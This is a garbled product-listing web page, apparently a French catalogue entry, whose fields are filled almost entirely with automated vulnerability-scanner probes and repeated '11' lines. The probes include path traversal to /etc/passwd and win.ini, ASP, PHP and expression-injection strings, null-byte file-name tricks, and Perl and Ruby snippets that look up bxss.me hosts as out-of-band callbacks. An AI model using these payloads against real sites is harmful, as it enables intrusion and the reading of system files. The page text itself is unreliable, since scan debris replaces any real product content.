NOS PRODUITS

1

WACKER IRSEN
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
KufRxZPK1
response.write(9524801*9677010)1
11
11
11
11
11
11
"+response.write(9524801*9677010)+"1
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
../../../../../../../../../../../../../../etc/passwd1
11
11
../../../../../../../../../../../../../../windows/win.ini1
11
11
11
11
11
../11
11
11
11
11
1PVCULNev
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
1response.write(9429141*9636741)
11
11
11
11
11
11
11
11
1"+response.write(9429141*9636741)+"
11
11
11
11
11
11
11
11
11
11
11
11
${9999533+9999759}1
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
1${9999362+10000000}
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg1
11
11
11
11
11
Array1
11
11
1&n937865=v9511611
11
1some_inexistent_file_with_long_name%00.jpg1
11
11
11
11
Http://bxss.me/t/fit.txt1
11
11
11
11
11
http://bxss.me/t/fit.txt%3F.jpg1
11
11
11
11
11
bxss.me1
11
11
11
)1
11
11
11
11
11
11
!(()&&!|*|*|1
1../../../../../../../../../../../../../../etc/passwd
11
11
1../../../../../../../../../../../../../../windows/win.ini
11
11
^(#$!@#$)(()))******1
11
".gethostbyname(lc("hitcl"."znqjwhsg39003.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(72).chr(114).chr(86)."1
11
11
11
11
1../1
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11&n995382=v967707
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
1Array
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
1".gethostbyname(lc("hitbe"."avmjdhlof371d.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(76).chr(111).chr(87)."
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
HttP://bxss.me/t/xss.html?%001
11
11
11
11
11
11
1)
11
"+"A".concat(70-3).concat(22*4).concat(107).concat(86).concat(119).concat(83)+(require"socket" Socket.gethostbyname("hitha"+"sndeqvrr6a45a.bxss.me.")[3].to_s)+"1
11
11
bxss.me/t/xss.html?%001
11
11
11
1!(()&&!|*|*|
11
11
11
11
1^(#$!@#$)(()))******
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
";print(md5(31337));$a="1
11
11
11
11
${@print(md5(31337))}1
11
11
11
11
11
11
11
11
11
11
11
1http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
11
11
11
11
11
11
11some_inexistent_file_with_long_name%00.jpg
11
11
11
11
1Http://bxss.me/t/fit.txt
11
11
1"+"A".concat(70-3).concat(22*4).concat(116).concat(82).concat(107).concat(75)+(require"socket" Socket.gethostbyname("hitlg"+"sckqflsje5310.bxss.me.")[3].to_s)+"
11
11
11
11
11
11
11
1http://bxss.me/t/fit.txt%3F.jpg
11
11
11
11
11
1bxss.me
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
1HttP://bxss.me/t/xss.html?%00
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))1
11
11
11
11
11
11
11
1bxss.me/t/xss.html?%00
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
1)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
/xfs.bxss.me1
11
11
11
11
11
11
11
11